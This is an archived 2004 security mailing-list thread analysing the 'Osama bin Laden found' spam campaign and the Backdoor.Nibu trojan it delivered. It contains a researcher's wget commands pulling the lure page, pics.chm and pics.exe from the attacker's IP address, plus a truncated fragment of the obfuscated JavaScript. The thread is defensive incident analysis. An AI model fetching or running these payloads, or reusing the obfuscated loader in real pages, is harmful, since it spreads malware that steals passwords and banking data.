Security Incidents mailing list archives
Re: Massive increase in spam volume?
From: "Don Wilder" <don () thewilders org>
Date: Mon, 26 Apr 2004 10:33:22 -0400
This is actually an exploit and was discussed last week on the Dshield email list. I am copying the findings here for your information.
-Don ---------- cut from Dshield ------------------From: "Blanchard, Joe" <BLANCHAJ () bsci com> Sender: <list-bounces () lists dshield org> Subject: RE: [Dshield] Osama email Date: Fri, 23 Apr 2004 14:05:26 -0400 To: "'General DShield Discussion List'" <list () lists dshield org> Not sure this is the same as noted on this article.
I'm seeing the following when hitting that linkhtml off of pics attempts to DL pics.chm, which in turn (I believe) DLs and runs pics.exe. Oddly, while I've not enough time to fully investigate this, it overwrites my wmplayer.exe resulting in a change in size to 11k from 72k. Variant maybe?
Cheers -Joe Follows is wgets of the item(s) [root@ jgb]# wget http://220.95.231.54/pics --13:59:16-- http://220.95.231.54/pics => `pics' Connecting to 220.95.231.54:80... connected. HTTP request sent, awaiting response... 302 Object Moved Location: http://220.95.231.54/pics/ [following] --13:59:17-- http://220.95.231.54/pics/ => `index.html' Connecting to 220.95.231.54:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4,113 [text/html]100%[====================================>] 4,113 17.54K/s ETA
00:00 13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113] [root@ jgb]# more index.html <script> <!-- function S(){var s=location.href.substr(7);return s.substr(0,s.indexOf('/'));} function T(){return 'l';} function U(){return 'C';} function V(){return 'm';} function W(){return '.';} function X(){return 'E';} function Y(){return 'i';} function Z(){return 'x';} document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+ "% 3"+U ()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X() +" %3"+==========intentional left out full source [root@jgb]# wget http://220.95.231.54/pics.chm
--14:00:56-- http://220.95.231.54/pics.chm => `pics.chm' Connecting to 220.95.231.54:80... connected. HTTP request sent, awaiting response... 200 OK Length: 11,268 [application/octet-stream]100%[====================================>] 11,268 23.72K/s ETA
00:00 14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268] [root@jgb]# wget http://220.95.231.54/pics.exe --14:03:11-- http://220.95.231.54/pics.exe => `pics.exe' Connecting to 220.95.231.54:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10,752 [application/octet-stream]100%[====================================>] 10,752 21.65K/s ETA
00:00 14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]
---------- From: list-bounces () lists dshield org[SMTP:list-bounces () lists dshield org] on behalf of Deb Hale[SMTP:haled () pionet net] Sent: Friday, April 23, 2004 12:40 PM To: 'General DShield Discussion List' Subject: [Dshield] Osama emailFYI ,I just received notification from my AV that the file that Bjorn
Stromberg
emailed had the Exploit-MhtRedir.gen virus. It appears that is what they are calling this particular email. Symantec calls it Backdoor.Nibu.D and
says
that it attempts to steal passwords and bank account information.
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.ht
ml Deb
_______________________________________________ list mailing list list () lists dshield org To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list ---------------------------------------------- On Sun, 25 Apr 2004 23:00:05 -0700 (PDT) "Jay D. Dyson" <jdyson () treachery net> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat, 24 Apr 2004, Thamer Al-Harbash wrote:I work at a large ISP in Canada and just a few hours ago we've experienced a massive increase in spam volume. The volume is so highit's bordering on being a denial of service attack.Does anyone know if there's a worm out in the wild currently doing this? I've confirmed with some of my collegues that other ISPs are alsoexperiencing this.I'm interested in finding specific netblocks but the spam seems to becoming from everywhere.I'd say you're seeing the first wave of what appears to be a new worm. Earlier this evening I received about 20 copies of the same message (same subject, same body, different senders) which was titled, "Osama bin Laden found!" and listed a URL (http://220.95.231.54/pics/).Being naturally curious (and even more naturally paranoid), I went to the URL...but not with my browser. What I snagged was an obfuscated Javascript page which -- from what I could decipher at a glance -- was some kind of spam pitch for cheap prescription drugs. I didn't botherlooking for a malicious payload after that.So what we have here could be a worm that spews spam. This sort of thing will pretty much render the idea of blackholing netblocks uselessnow, since unpatched Windows system are everywhere.That's my take. I look forward to hearing about what others haveseen land in their inboxes. - -Jay( ( _______ )) )) .--"There's always time for a good cup of coffee."--. >====<--. C|~~|C|~~| )>------ Jay D. Dyson - jdyson () treachery net ------<( | = |-' `--' `--' `-If you wanna make God laugh, tell him your plans.-' `------'-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (TreacherOS)Comment: See http://www.treachery.net/~jdyson/ for current keys.iD8DBQFAjKVp6uxsHJ5aYG4RAsRGAJ484Fe0Rp1i+d/yt3yAnDPPRoSvwACcC8I0 aSmguv2f7zEF4hky8xDx6D4= =ZZ/E -----END PGP SIGNATURE----- --------------------------------------------------------------------------- ----------------------------------------------------------------------------
--------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- Massive increase in spam volume? Thamer Al-Harbash (Apr 25)
- Re: Massive increase in spam volume? Ken Budd (Apr 25)
- Re: Massive increase in spam volume? Vinod Kumar (Apr 26)
- RE: Massive increase in spam volume? Bojan Zdrnja (Apr 26)
- Re: Massive increase in spam volume? TML (Apr 26)
- Re: Massive increase in spam volume? Josh Tolley (Apr 26)
- RE: Massive increase in spam volume? James C Slora Jr (Apr 26)
- Re: Massive increase in spam volume? Jay D. Dyson (Apr 26)
- Re: Massive increase in spam volume? Niek (Apr 26)
- Re: Massive increase in spam volume? 'Osama Captured' e-Mail is Malicious Trojan webdevi (Apr 26)
- Re: Massive increase in spam volume? Don Wilder (Apr 26)
- Re: Massive increase in spam volume? David M. Dinner (Apr 27)
- <Possible follow-ups>
- RE: Massive increase in spam volume? Tom . Marchand (Apr 26)
- RE: Massive increase in spam volume? Garneau . Marie-Josee (Apr 26)
- FW: Massive increase in spam volume? Andy Streule (Apr 27)
- RE: Massive increase in spam volume? Steven Trewick (Apr 27)
- RE: Massive increase in spam volume? Thamer Al-Harbash (Apr 30)
- Re: Massive increase in spam volume? Ken Budd (Apr 25)